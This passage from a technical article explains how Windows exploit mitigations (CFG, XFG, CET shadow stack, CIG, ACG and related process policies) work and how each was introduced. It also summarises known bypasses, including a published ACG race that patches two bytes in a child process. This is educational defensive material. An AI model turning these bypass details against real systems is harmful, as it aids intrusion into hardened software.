The structural answer arrived two years before the offensive proof that motivated it. In November 2005, at ACM CCS, Martín Abadi, Mihai Budiu, Úlfar Erlingsson, and Jay Ligatti published Control-Flow Integrity (also released as Microsoft Research Technical Report MSR-TR-2005-18) [@msr-cfi]. Their formal definition is short: the execution of a program dynamically follows only paths defined by a static control-flow graph. They proved CFI is enforceable using compile-time-inserted runtime checks and demonstrated a software rewriting implementation.

A defensive property formalized by Abadi, Budiu, Erlingsson, and Ligatti in 2005 [@msr-cfi]: the execution of a program must dynamically follow only paths defined by the static control-flow graph (CFG) of the program. CFI partitions into a forward-edge property (the targets of indirect calls and jumps must be valid) and a backward-edge property (the targets of returns must be the call-sites that called them). CFG, XFG, kCFG, and Apple's PAC are forward-edge CFI implementations. CET's shadow stack is a backward-edge CFI implementation.

CFI was a research framework looking for a vendor. It would wait nine years. The reader's belief at this point might be "DEP plus ASLR is enough." The honest belief, after Shacham, is that DEP plus ASLR raises the cost but does not change the game. The attacker still wins if they can choose where the next ret lands. The structural answer -- constraining the control transfer rather than the write -- is what makes Control Flow Guard make sense.

What does constraining the control transfer look like in machine code?

4. Control Flow Guard (CFG): compile-time, load-time, runtime

Where DEP was enforced by hardware on every page, CFG is enforced by software on every indirect call. The compiler is now a security tool.

CFG's ship history is more complicated than the marketing remembers. The canonical primary on the early dates is Yunhai Zhang's Black Hat USA 2015 deck, Bypass Control Flow Guard Comprehensively, which states verbatim: "It was first introduced in Windows 8.1 Preview, but disabled in Windows 8.1 RTM for compatibility reason. Then, it was improved and enabled in Windows 10 Technical Preview and Windows 8.1 Update" [@zhang-bhusa15]. Visual Studio 2015 added the compiler and linker flags. By the time Windows 10 shipped to consumers in July 2015, CFG was a documented Win32 security feature [@ms-cfg-doc].Stage 1 had this ship date as "Windows 8.1 Update 3 November 2014 vs Windows 10 July 2015". Zhang's deck is the contemporaneous primary that resolves the dispute. CFG was in Windows 8.1 Preview, was removed from Windows 8.1 RTM for compatibility, returned in Windows 8.1 Update and Windows 10 Technical Preview, and shipped widely with Windows 10 in 2015.

The mechanism has four phases. Each phase is a separate engineering subsystem, owned by a different team.

Phase 1: Compile-time (/guard:cf). The MSVC compiler emits, before every indirect call instruction, a call to one of two compiler-supplied thunks: __guard_check_icall_fptr for the standard pattern, or __guard_dispatch_icall_fptr for the tail-call optimization where the validator itself jumps to the target [@ms-guard-cf-compiler]. The thunk is a single indirection through ntdll. At compile time it is a stub; at load time it is patched to point at the active validator.

Phase 2: Link-time (/GUARD:CF, which requires /DYNAMICBASE). The linker writes the Guard CF Function Table (FID table) into the PE image's IMAGE_LOAD_CONFIG_DIRECTORY [@ms-guard-cf-linker]. This table is the static catalog of every CFG-valid call target in this binary: every function whose address is taken, plus every function exported. dumpbin /headers /loadconfig <binary> prints the table contents -- you can read the actual Guard CF flag word and the FID table present line.

Note: The MSVC linker only emits the FID table when /DYNAMICBASE is also set [@ms-guard-cf-compiler, @ms-guard-cf-linker]. A binary compiled with /guard:cf but linked without /DYNAMICBASE will pass code review, ship, and provide zero protection at runtime. This is the single most common CFG misconfiguration in third-party software. Always confirm with dumpbin /headers /loadconfig that the Guard Flags word is non-zero and that FID Table present is in the output.

Phase 3: Load-time. At process startup and on every subsequent LoadLibrary, ntdll!LdrpProtectAndRelocateImage unions the FID table of the loaded image into a per-process bitmap. The bitmap is a sparse data structure with one bit per 8 bytes of virtual address space. On 32-bit Windows, that is about 32 megabytes of address space worth of valid-target bits. On x64, the address space is so large the bitmap is hundreds of megabytes sparse-allocated -- but the memory only commits on access, so the resident set stays small.

A sparse, per-process bit vector indexed by virtual address (one bit per 8 bytes). A set bit at index `addr / 8` means that `addr` is a CFG-valid indirect-call target in some loaded image. The kernel commits the bitmap pages on first access and shares them copy-on-write across processes with identical module-load layouts. The bitmap is the runtime data structure that `LdrpValidateUserCallTarget` consults on every indirect call.

Phase 4: Runtime. Every indirect call goes through ntdll!LdrpValidateUserCallTarget. The validator takes the call target in rcx (x64 calling convention), divides by 8, indexes into the bitmap, and tests the bit. If set, return; the call proceeds. If clear, fall through to __fastfail(FAST_FAIL_GUARD_ICALL_CHECK_FAILURE), which raises STATUS_STACK_BUFFER_OVERRUN. The process dies.

sequenceDiagram participant Src as C++ source participant CC as "MSVC /guard:cf" participant Ln as "Linker /GUARD:CF /DYNAMICBASE" participant Ldr as ntdll loader participant Rt as Runtime Src->>CC: address-taken funcs plus indirect call sites CC->>Ln: object file plus FID hints Ln->>Ldr: PE with FID table in load-config dir Ldr->>Ldr: union FID table into bitmap Note over Ldr: one bit per 8 bytes Rt->>Ldr: indirect call via LdrpValidateUserCallTarget alt bit set Ldr->>Rt: proceed else bit clear Ldr->>Rt: fastfail STATUS_STACK_BUFFER_OVERRUN end

There is an exception: code that is generated at runtime, like a JavaScript JIT, cannot have its targets pre-baked into a static FID table. For this case, CFG exposes SetProcessValidCallTargets, which lets a process programmatically mark an in-process address range as a permitted call target [@ms-cfg-doc]. The companion PAGE_TARGETS_INVALID and PAGE_TARGETS_NO_UPDATE page-protection flags let the process control which newly-allocated pages start with a clear bitmap. The reason this API exists at all is the structural collision between W^X-via-CFG and runtime code generation -- a collision that section 8 (ACG) will eventually resolve by moving the JIT out of process.

You can read the load-config flag word directly. The hex value is a bit field of IMAGE_GUARD_* constants. The most common bits are IMAGE_GUARD_CF_INSTRUMENTED (the binary has CFG indirect-call checks), IMAGE_GUARD_CFW_INSTRUMENTED (the binary has CFG indirect-call checks plus write-protection checks), IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT (the FID table is in the PE), IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT, and IMAGE_GUARD_RETPOLINE_PRESENT. The decoder is short enough to inline:

{` const FLAGS = [ [0x00000100, 'IMAGE_GUARD_CF_INSTRUMENTED'], [0x00000200, 'IMAGE_GUARD_CFW_INSTRUMENTED'], [0x00000400, 'IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT'], [0x00000800, 'IMAGE_GUARD_SECURITY_COOKIE_UNUSED'], [0x00001000, 'IMAGE_GUARD_PROTECT_DELAYLOAD_IAT'], [0x00002000, 'IMAGE_GUARD_DELAYLOAD_IAT_IN_ITS_OWN_SECTION'], [0x00004000, 'IMAGE_GUARD_CF_EXPORT_SUPPRESSION_INFO_PRESENT'], [0x00008000, 'IMAGE_GUARD_CF_ENABLE_EXPORT_SUPPRESSION'], [0x00010000, 'IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT'], [0x00020000, 'IMAGE_GUARD_RF_INSTRUMENTED'], [0x00040000, 'IMAGE_GUARD_RF_ENABLE'], [0x00080000, 'IMAGE_GUARD_RF_STRICT'], [0x00100000, 'IMAGE_GUARD_RETPOLINE_PRESENT'], ];

// Real-world example value from a fully-instrumented MSVC 2022 binary const guardFlags = 0x0001050C; console.log('Guard Flags = 0x' + guardFlags.toString(16).padStart(8, '0')); for (const [bit, name] of FLAGS) { if (guardFlags & bit) console.log(' set: ' + name); } `}

CFG is forward-edge only. The ret instruction is invisible to it. A ROP chain that uses only return-target gadgets -- the original Shacham construction -- is not affected by CFG at all, because CFG never asks "where did this ret go?" It only asks "where did this indirect call go?" Closing the backward edge is a separate problem (section 6).

CFG is also coarse-grained. The bitmap records "is this address a valid function entry?" but not "is this address a valid function entry for this particular call site's prototype?" Any function entry in the entire process is a valid CFG target for every indirect call site. If the attacker finds a legitimate function that takes a controllable argument and does something useful, they can chain it into a working exploit without ever flipping a clear bit to set.

Those two limitations -- forward-edge only, coarse-grained -- are precisely the open questions section 5 (XFG, fine-graining) and section 6 (CET shadow stack, backward edge) answer. CFG was the first floor. The next two sections build out the rest.

5. eXtended Flow Guard (XFG): type-hash, fine-grained CFI for indirect calls

CFG knows is this a function entry? XFG asks the better question: is this the right kind of function entry?

The structural reason XFG exists has a name and a paper. May 2015, IEEE Symposium on Security and Privacy. Felix Schuster, Thomas Tendyck, Christopher Liebchen, Lucas Davi, Ahmad-Reza Sadeghi, and Thorsten Holz publish Counterfeit Object-oriented Programming: On the Difficulty of Preventing Code Reuse Attacks in C++ Applications [@coop-ieeesecurity-pdf]. The paper's abstract is constructive and brutal: COOP is "the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms" that "fully complies with previously presented coarse-grained CFI defenses."

We propose a new attack technique, called Counterfeit Object-Oriented Programming (COOP), which is the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms and which fully complies with previously presented coarse-grained CFI defenses. -- Schuster et al., IEEE S&P 2015 [@coop-ieeesecurity-pdf] A code-reuse attack technique that chains legitimate C++ virtual function calls in attacker-chosen order, achieved by corrupting vtable pointers or vtable contents. Each individual callee is a real, address-taken function entry that passes any coarse-grained CFI bitmap. The attacker assembles Turing-complete computation by chaining these legitimate calls. Published by Schuster, Tendyck, Liebchen, Davi, Sadeghi, and Holz at IEEE S&P 2015 [@coop-ieeesecurity-pdf].

The mechanism is simple to describe but hard to detect. The attacker corrupts a heap-resident C++ object's vtable pointer to point at a fake vtable they have crafted from gadget-like virtual functions of real classes in the binary. Each entry in the fake vtable points at the entry of a real virtual method. The program's own virtual dispatch sequence performs the calls. The control transfers all land at legitimate function entries. CFG, which only asks "is this a function entry?", sees nothing wrong.

Microsoft's first public disclosure of the answer came at BlueHat Shanghai in 2019. David Weston -- listed on the title slide of the deck as "Microsoft OS Security Group Manager" -- presented the design of eXtended Flow Guard (XFG) [@weston-bhshanghai-2019]. Microsoft never published a written XFG specification; the canonical public deconstruction is Connor McGarr's August 2020 reverse-engineering, which remains the best public account of how the mechanism actually works [@mcgarr-xfg].

The mechanism is elegant. At compile time, MSVC computes a 64-bit type hash for every function: a truncated SHA-256 (first 8 bytes of the 32-byte digest) of the parameter count, parameter types, variadic flag, calling convention, and return type. The compiler stores this hash 8 bytes before each CFG-valid function entry [@mcgarr-xfg]. At each indirect call site, the compiler knows the expected prototype (from the call's static type), emits the same hash inline, and the dispatch thunk reads the 8 bytes preceding the target and compares.

flowchart TD A[Indirect call site] --> B{"CFG bitmap
bit set?"} B -->|No| F1[__fastfail] B -->|Yes| C{"XFG enabled?"} C -->|No| D[Proceed
CFG only] C -->|Yes| E[Read hash
at target - 8] E --> G{"Hash matches
expected prototype?"} G -->|No| F2[__fastfail
same status] G -->|Yes| H[Proceed
full XFG]

A COOP attacker who replaces a vtable pointer with the address of a different real virtual function passes CFG: the new target is a valid function entry. They fail XFG: the 8 bytes preceding the new target encode a different prototype hash than the call site expects. The fix moves the granularity from "every function entry" to "every function entry compatible with this exact prototype" -- orders of magnitude closer to perfect forward-edge CFI.

XFG shipped in Windows 10 21H1 internals. The /guard:xfg MSVC flag was added. The XFG dispatch thunks (__guard_xfg_dispatch_icall_fptr) appeared in ntdll.dll. Then it didn't enable by default.Connor McGarr's Black Hat USA 2025 deck, Out of Control: How KCFG and KCET Redefine Control Flow Integrity in the Windows Kernel, states verbatim: "XFG was never fully instrumented (UM/KM) and is now deprecated." McGarr is listed on the title slide as Software Engineer, Prelude Security [@mcgarr-bhusa25].

Two reasons XFG didn't ship enforcement-by-default. First, compatibility cost: XFG breaks any C-style cast through a different prototype. Windows is full of these, including in third-party drivers and inbox-COM components, and every breakage costs a customer ticket. Second, hardware overtook software. CET shadow stack arrived on Tiger Lake in September 2020 (section 6) and gave the entire backward edge for free, leaving the forward-edge problem partially un-fine-grained but the *complete* CFI surface achievable by composing CFG (forward, coarse) with CET (backward, perfect). The math worked out: ship CET strictly, and a coarse-grained forward edge is good enough -- because the backward edge, the bigger half of the call graph, is now perfect.

XFG remains the most interesting almost-shipped Windows mitigation. The instrumentation is in MSVC. The dispatch thunks are in ntdll. Enforcement-by-default never arrived, and the McGarr 2025 deck names it as deprecated. The strategic pivot to hardware is what Microsoft made instead.

What does that hardware look like, and what edge does it protect? Tiger Lake shipped in September 2020. For the first time since Shacham 2007, the kind of ROP that chains ret-terminated gadgets could be killed by the CPU itself.

6. Hardware-enforced Stack Protection (Intel CET shadow stack)

The Microsoft Tech Community post that introduced CET shadow stack on Windows -- preserved on the Wayback Machine because the live URL is a JavaScript-rendered shell -- gives the framing in one sentence:

We shipped Control Flow Guard (CFG) in Windows 10 to enforce integrity on indirect calls (forward-edge CFI). Hardware-enforced Stack Protection will enforce integrity on return addresses on the stack (backward-edge CFI), via Shadow Stacks. -- Microsoft Tech Community, *Understanding Hardware-enforced Stack Protection* [@cet-techcommunity-wayback] A second, per-thread stack maintained by the CPU in parallel with the regular call stack. Every `call` instruction pushes the return address to both stacks. Every `ret` pops both and compares. A mismatch raises a `#CP` (Control Protection) fault, which Windows surfaces as `STATUS_STACK_BUFFER_OVERRUN`. The shadow stack page is hardware-protected: only the new instructions `INCSSP`, `RDSSP`, `WRSS`, and the call/ret/IRET microcode can write to it. User-mode stores into a shadow-stack page fault.

The mechanism, drawn from Intel's CET specification and Microsoft's Windows enabling documents [@cet-techcommunity-wayback, @wiki-intel-cet, @ms-cetcompat]:

Every call instruction now writes the return address twice -- once to the regular stack, and once to the per-thread shadow stack at [SSP].
The shadow-stack page is marked with a new MMU bit that makes it readable but not writable by general store instructions. Only the new instructions INCSSP, RDSSP, WRSS, WRUSS, and the call/ret/IRET microcode can store to it.
Every ret pops the regular stack and pops the shadow stack and compares. Equal: proceed. Different: raise #CP. On Windows, #CP is routed through the KiRaiseException path as STATUS_STACK_BUFFER_OVERRUN.
New instructions exist for legitimate unwinding. INCSSP imm advances the SSP across unwound frames -- the C++ longjmp and the Windows SEH unwinder both use this. RDSSP reads the current SSP into a register.
The /CETCOMPAT MSVC linker flag, available from Visual Studio 2019 onward, marks an x64 image as shadow-stack-compatible by setting the IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT bit in the extended DLL characteristics word [@ms-cetcompat].

Tiger Lake shipped CET first, in September 2020. AMD followed with the same architectural spec in Zen 3 in November 2020 [@wiki-intel-cet]. The two vendors implement the same instructions, the same MMU bit, the same fault. The shadow-stack image format is identical. Windows uses the same code paths on both.AMD Zen 3 was launched on November 5, 2020, two months after Tiger Lake [@wiki-intel-cet]. Both vendors implement the Intel CET specification verbatim, so Microsoft's Windows enabling code is single-source.

sequenceDiagram participant CPU participant RStack as Regular stack participant SStack as Shadow stack Note over CPU,SStack: function prologue CPU->>RStack: push retaddr_A CPU->>SStack: push retaddr_A (shadow) Note over CPU,SStack: attacker corrupts retaddr_A on regular stack to retaddr_X Note over CPU,SStack: function epilogue CPU->>RStack: pop -> retaddr_X CPU->>SStack: pop -> retaddr_A CPU->>CPU: compare retaddr_X vs retaddr_A CPU->>CPU: mismatch CP fault then STATUS_STACK_BUFFER_OVERRUN

The Windows policy surface for CET is ProcessUserShadowStackPolicy, structured exactly like every other policy in the enum -- a DWORD of bitfields and a "reserved" tail [@ms-user-shadow-stack-policy]. Ten flags are documented:

EnableUserShadowStack -- turn it on (compatibility mode: only shadow-stack violations in CETCOMPAT-marked modules are fatal)
AuditUserShadowStack -- log without enforcing
SetContextIpValidation -- block SetThreadContext (and the equivalent NtSetContextThread from a peer process) from setting an instruction pointer to an unguarded address
AuditSetContextIpValidation -- log version
EnableUserShadowStackStrictMode -- upgrade from compatibility mode (only CETCOMPAT-module shadow-stack violations are fatal) to strict mode (all shadow-stack violations are fatal, even in non-CETCOMPAT modules)
BlockNonCetBinaries -- the loader refuses to map non-/CETCOMPAT DLLs into the process; strict policy for the most-hardened sandboxes
BlockNonCetBinariesNonEhcont -- like BlockNonCetBinaries, but also requires images to carry /guard:ehcont exception-handling continuation metadata
AuditBlockNonCetBinaries -- log version of BlockNonCetBinaries
SetContextIpValidationRelaxedMode -- permits some legacy patterns
CetDynamicApisOutOfProcOnly -- requires SetProcessValidCallTargets-style operations to come from a peer process

The SetContextIpValidation flag is worth a separate paragraph. The original CET shadow-stack design protected against attackers who corrupted return addresses on the regular stack. A more subtle attack used SetThreadContext from a peer process (or, equivalently, the in-process NtSetContextThread) to write a register-state structure containing an attacker-chosen RIP. The thread, when resumed, would jump to that RIP -- with no ret instruction involved, so the shadow stack saw nothing. SetContextIpValidation closes that hole by validating the requested RIP against the bitmap before the kernel resumes the thread. Without it, CET shadow stack has a documented bypass [@ms-user-shadow-stack-policy].

A new CPU exception introduced with Intel CET. Raised when a shadow-stack compare fails on `ret`, when an `endbranch` instruction is missing at an indirect-branch target (for IBT-style CET, separate from shadow stack), or when an attempt is made to write to a shadow-stack page from a non-shadow-stack instruction. Windows routes `#CP` through `STATUS_STACK_BUFFER_OVERRUN`, the same status used for stack-canary violations and CFG failures.

Compose CFG with CET shadow stack and you have the result the entire arc since Aleph One has been pointing at:

Key idea: CFG (forward edge) plus CET shadow stack (backward edge) equals full Control-Flow Integrity on x86-64, from compiler plus hardware. This is the cleanest moment in the article: two mitigations, from two different layers, compose into a property that took twenty years to assemble.

Full CFI is not the same as full security. CET still does not cover three structural attack classes. Call-oriented programming and jump-oriented programming chain gadgets ending in call or jmp rather than ret; the call/return invariant is preserved, so CET sees nothing. COOP chains entire legitimate virtual functions with matching call/return pairs; CET sees nothing. Data-oriented attacks (section 13) never violate any control-flow invariant at all, because they never hijack control flow in the first place.

We have constrained the control flow. We have not constrained which code is in the process. An attacker can still load a malicious-but-signed-looking DLL through the loader, or persuade a JIT to emit attacker-chosen bytes into the JIT heap and then redirect a legitimate call to that JIT-allocated address. That is the code layer, not the control flow layer. The parallel mitigation path -- CIG and ACG -- is what closes it.

7. Code Integrity Guard (CIG): only signed images can load

Even if the attacker can't generate code and can't redirect control flow, they can still ask the loader to do it for them. Plant a Microsoft-signed DLL somewhere the loader will pick it up; LoadLibrary runs the planted DLL's DllMain; you have remote code execution through a trusted entry point. The structural answer is to restrict the universe of DLLs the loader will ever map into a hardened process.

That is the function of Code Integrity Guard. CIG first appeared in Microsoft Edge in Windows 10 1511 (November 2015) [@miller-acg-blog]. The canonical primary on its design is Matt Miller's February 2017 Edge blog Mitigating arbitrary native code execution in Microsoft Edge [@miller-acg-blog]. The corresponding policy in SetProcessMitigationPolicy is ProcessSignaturePolicy, with the bitfield PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY [@ms-binary-signature-policy].

A per-process policy that restricts the set of binaries the loader will map into the process to images signed by an allowed code-signing root. Implemented in Windows via the `ProcessSignaturePolicy` mitigation policy. The most common configuration is `MicrosoftSignedOnly`, which restricts loads to Microsoft-rooted catalogue chains. Bypass attempts that load a malicious DLL into the process return `STATUS_INVALID_IMAGE_HASH` from `LoadLibrary` / `LoadLibraryEx` / `NtMapViewOfSection` [@miller-acg-blog, @ms-binary-signature-policy].

The policy structure carries three levels:

MicrosoftSignedOnly -- only images chaining to a Microsoft root will load
StoreSignedOnly -- only Microsoft Store-signed images
MitigationOptIn -- the loader accepts any image signed by Microsoft, the Windows Store, or the Windows Hardware Quality Labs (WHQL); the broadest of the three signing-level settings

Plus an AuditMicrosoftSignedOnly audit-only flag that logs without blocking, for compatibility testing in the run-up to enforcement.

The kernel subsystem that enforces image-signing policy on user-mode binary loads. UMCI is the user-mode counterpart of KMCI (Kernel-Mode Code Integrity, used by Windows Driver Signature Enforcement and HVCI). CIG calls into UMCI on every `NtMapViewOfSection` to verify that the section's backing image is signed by an allowed root before the loader maps it.

The mechanism is small. Every LoadLibrary, every LoadLibraryEx, and every NtMapViewOfSection consults UMCI (User-Mode Code Integrity). If the image is not signed by a Microsoft-rooted catalogue chain when MicrosoftSignedOnly is in effect, the load returns STATUS_INVALID_IMAGE_HASH [@miller-acg-blog, @ms-binary-signature-policy]. The process keeps running; the DLL just doesn't load. (Most attack chains aren't structured to handle that gracefully, so in practice the process crashes shortly afterward when it tries to dereference a function pointer the failed DLL was supposed to provide.)

CIG is a publisher check, not a content check. A Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, or the CVE-2013-3900 Authenticode-padding family that allows a signed binary to carry attacker-controlled trailing data without invalidating the signature -- still loads normally. CIG can't tell. App Control (formerly Windows Defender Application Control) and the Microsoft Driver Block List are the partial answer: a curated list of banned-but-signed binaries UMCI consults and rejects even when their signatures verify.

CVE-2013-3900 was disclosed in December 2013. Microsoft shipped an opt-in registry fix (EnableCertPaddingCheck) and left the strict default off for over a decade for compatibility reasons; in July 2024 the company republished the CVE in the Security Update Guide to formally reaffirm that the strict-Authenticode behaviour remains available as an opt-in across all currently supported releases of Windows 10 and Windows 11 ("Microsoft does not plan to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows") [@nvd-cve-2013-3900]. The structural-vulnerable-but-signed class has been operationally hard to retire for the same reason every backwards-compatibility constraint is hard to retire.

Note: ProcessSignaturePolicy is applied to subsequent loader operations after the policy is installed. DLLs that were already mapped into the process before the call to SetProcessMitigationPolicy are not unloaded retroactively. This is the structural reason serious sandboxed processes (Edge content, Chrome renderer) use UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) at CreateProcess time -- the kernel installs the policy before the child's first user-mode instruction runs, so even the loader's initial sweep of static imports is policed.

The Microsoft-signed DLL universe is large. Many of those binaries have controllable side effects: search-order hijacks, Authenticode-padding writes, signed-driver privilege primitives, signed-tooling code-injection helpers. CIG does not look at side effects; it only looks at the signature. The residual class that survives `MicrosoftSignedOnly` -- "signed but vulnerable" -- is precisely the class App Control's reactive blocklist tries to keep up with. As of the 2025 Driver Block List there are hundreds of blocked-but-signed binaries; the list grows every quarter. This is one of the unsolved problems the article closes with in section 14.

CIG and ACG are siblings but not synonyms. CIG prohibits loading unsigned images. ACG prohibits generating new executable code at runtime. They attack different attack surfaces. The signed-DLL-injection bypass that defeats CIG does not defeat ACG, because the planted DLL is not generating new code -- it is using its (signed but vulnerable) existing code. The JIT-spray-as-CFG-bypass that defeats ACG does not defeat CIG, because the JIT was not loading a new DLL. An attacker who solves one still has to solve the other.

What does the generation half look like?

8. Arbitrary Code Guard (ACG): W^X for the entire process

March 2017. Windows 10 Creators Update ships. Microsoft Edge enables a single flag in the new ProcessDynamicCodePolicy structure. Every JavaScript JIT engine in the world has to be rearchitected.

A per-process policy that prevents *any* code that did not originate as a signed image at startup from becoming executable. With ACG enabled, calls to `VirtualAlloc` with `PAGE_EXECUTE_*` return `STATUS_DYNAMIC_CODE_BLOCKED`. Calls to `VirtualProtect` that attempt to *add* execute permission to an existing page return the same status. `MapViewOfSection` with `SECTION_MAP_EXECUTE` requires the section's backing image to be signed. The net effect: every executable byte in the process originated as a Microsoft-signed PE mapped by the loader at startup, and nothing else can ever become runnable in this process's address space [@miller-acg-blog, @ms-dynamic-code-policy].

The PROCESS_MITIGATION_DYNAMIC_CODE_POLICY structure carries four flags [@ms-dynamic-code-policy]:

ProhibitDynamicCode -- the core enforcement flag
AllowThreadOptOut -- a thread can call SetThreadInformation(ThreadDynamicCodePolicy, 0) to escape, which Microsoft's documentation warns against using with ProhibitDynamicCode because the two flags together leak the policy's intent
AllowRemoteDowngrade -- a higher-privileged peer can disable the policy via SetProcessMitigationPolicy
AuditProhibitDynamicCode -- log without enforcing

The structural rule, restated mechanically [@miller-acg-blog, @ms-dynamic-code-policy]:

VirtualAlloc with PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, or PAGE_EXECUTE_WRITECOPY: blocked.
VirtualProtect that adds any executable permission to an existing page: blocked.
MapViewOfSection with SECTION_MAP_EXECUTE for a section not backed by a signed image: blocked.
The only way new executable pages enter the process: the loader maps signed PEs at module load time, and (with CIG also on) only Microsoft-signed PEs.

The browser-JIT architectural consequence is the most-cited single change in the entire Windows mitigation literature. Pre-2017, every JavaScript JIT generated native code at runtime into a RWX-permission heap inside its own browser process. The pattern was simple: allocate a page, write machine code into it, mark it executable, jump. ACG turned that pattern into a fatal error.

Chakra (then Edge's engine), V8 (Chrome's engine, when Edge later switched to Chromium), SpiderMonkey (Firefox), and JavaScriptCore (Safari) all responded by moving the JIT compilation step out of the renderer process [@miller-acg-blog]. The architecture became: the renderer ships JavaScript source over an authenticated IPC channel to a JIT process; the JIT process compiles to machine code; the JIT process owns a signed section backing the compiled output; the renderer maps that signed section read-execute via MapViewOfFile and dispatches into it. The renderer is locked into ACG. The JIT process is not (it has to write code), but it never parses untrusted content -- only pre-validated bytecode from the renderer over a typed IPC schema.

flowchart LR subgraph Pre["Pre-ACG (before March 2017)"] direction TB R1[Renderer process] R1 --> J1[In-process JIT] J1 --> H1["RWX JIT heap
(W^X violation)"] H1 --> E1[Execute jitted
JS] end subgraph Post["Post-ACG (Edge 1703 and later)"] direction TB R2[Renderer
ACG on] R2 -->|IPC bytecode| J2[JIT process
ACG off] J2 -->|signed
section| S2[Shared mapping] R2 -->|MapViewOfFile
R-X| S2 S2 --> E2[Execute jitted
JS in renderer] end

That rearchitecture is the structural cost ACG imposed. It is not small. Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip, which matters for short-lived JavaScript (lots of small functions, one-shot pages). It also creates a new trust boundary -- between renderer and JIT process -- which is itself an attack surface, and which the next paragraph names.

The bypass tradition starts almost immediately. Reported December 2017, publicly disclosed February 2018, Project Zero issue 42450607. James Forshaw and Ivan Fratric document the race-the-mitigation-window class [@p0-issue-42450607, @exploit-db-44467]. The PoC is small enough to read in one paragraph.

Each Edge content process (`MicrosoftEdgeCP.exe`) called `SetProcessMitigationPolicy(ProcessDynamicCodePolicy, ...)` on itself shortly after startup. The advisory documents the verbatim callstack: `MicrosoftEdgeCP!SetProcessDynamicCodePolicy+0xc0`. Forshaw and Fratric discovered that there is a window between `CreateProcess` returning the new content process's handle and that child's first call into `SetProcessDynamicCodePolicy`. During that window, a peer content process in the same AppContainer can `OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION)` the new child and `WriteProcessMemory` two specific bytes -- at Edge offsets `0x23090` and `0x23092` on the version Forshaw and Fratric tested, build "up-to-date on Windows 10 version 1709" [@p0-issue-42450607]. The two bytes are global flags that, if set, cause `SetProcessDynamicCodePolicy` to short-circuit and return success without installing the policy. The result: a child renderer that *thinks* ACG is on, that the parent thinks has ACG on, but in which `VirtualAlloc(PAGE_EXECUTE_READWRITE)` succeeds normally. Microsoft's fix was structural: migrate to `UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)`, so the policy is installed *by the kernel* before the child's first user-mode instruction runs and the race window closes.

The second-generation bypass came faster than anyone expected. May 2018, Ivan Fratric publishes Bypassing Mitigations by Attacking the JIT Server on the Project Zero blog [@p0-fratric-jit-2018]. Once ACG forced JIT out of process, the new attack surface was the IPC channel and the JIT-server allocation address. Fratric writes: "we believe that any other attempt to implement out-of-process JIT would encounter similar problems." That sentence is the deeper lesson of the entire mitigation tradition: a new trust boundary -- between renderer and JIT process, between user and kernel, between content process and broker -- is a new attack class. You did not eliminate the attack surface; you moved it.

ACG plus CIG, then, closes "what code can run in this process": no unsigned image loads (CIG), no dynamic code generation (ACG), no executable allocations of any kind that did not originate as a signed PE on disk. That is a closed surface for the code dimension. But the attacker has more options than memory and signatures. There is the kernel surface beneath the renderer's syscalls. There is the legacy extension-point loader. There are fonts, image loads, side channels. Those are the smaller, operationally-critical mitigations -- the rest of the twenty.

9. The smaller, operationally critical mitigations

DEP, ASLR, CFG, CET, CIG, ACG -- that is the canonical six. But the PROCESS_MITIGATION_POLICY enum lists twenty-one values [@ms-process-mitigation-enum]. The other fourteen actual policies are not afterthoughts. Each one is a tombstone for a specific attack class that did not fit into "don't let the attacker write code" or "don't let the attacker pick the call target."

`ProcessSystemCallDisablePolicy` -- Disable Win32k System Calls

Edge content process, 2017 onward. The Win32k.sys driver implements the GUI subsystem and was, for many years, the single largest contributor to Windows kernel CVEs. A renderer process that does not draw windows can refuse Win32k syscalls entirely, eliminating an enormous swath of kernel attack surface for a compromised renderer. The Edge content process is the canonical user. The Edge sandbox blog documents the AC architecture and capability model the renderer runs inside [@edge-sandbox-blog]; the policy enum entry itself is in ms-setprocessmitigationpolicy [@ms-setprocessmitigationpolicy]. Connor McGarr's 2025 deck addresses the Win32k surface explicitly: "Call targets in Win32k can be corrupted with a valid NT call target" -- which is the structural reason the policy exists [@mcgarr-bhusa25].

`ProcessExtensionPointDisablePolicy`

Disables legacy extension-point classes that have historically been DLL-injection vectors: AppInit_DLLs (registry-driven inject-into-everything), IME modules, Layered Service Providers (LSP, the Winsock provider chain), WinEventHook/SetWindowsHookEx global hooks. Enabling the policy makes the loader refuse to map any DLL through these legacy paths into the process [@ms-setprocessmitigationpolicy, @ms-process-mitigation-enum]. This is one of the lowest-cost mitigations to enable for any process that does not knowingly need legacy IME or LSP integration.

`ProcessFontDisablePolicy`

Refuses non-system fonts. The historical motivation was a 2015 wave of ATMFD.DLL kernel-font-parser CVEs (the Adobe Type Manager font driver). Microsoft moved the font parser out of the kernel into user mode after that wave, and this per-process policy then refuses non-system fonts entirely for browser-class sandboxed processes that do not need them [@ms-setprocessmitigationpolicy].

`ProcessImageLoadPolicy`

Three loader-time flags, all about where a DLL can come from:

NoRemoteImages -- block DLLs whose path is a UNC \\server\share\dll. Eliminates a remote-DLL family that crossed administrative boundaries.
NoLowMandatoryLabelImages -- block DLLs whose file was written by a low-integrity-label process. A compromised sandboxed process could write a DLL to disk; this flag stops a peer broker from picking that DLL up.
PreferSystem32Images -- search \Windows\System32\ before the application directory in the DLL search order. Closes the DLL-search-order-hijack class, a very old attack surface.

All three are in [@ms-image-load-policy]. Together they collapse the DLL-loading attack surface to a small, well-controlled set of code paths.

`ProcessStrictHandleCheckPolicy`

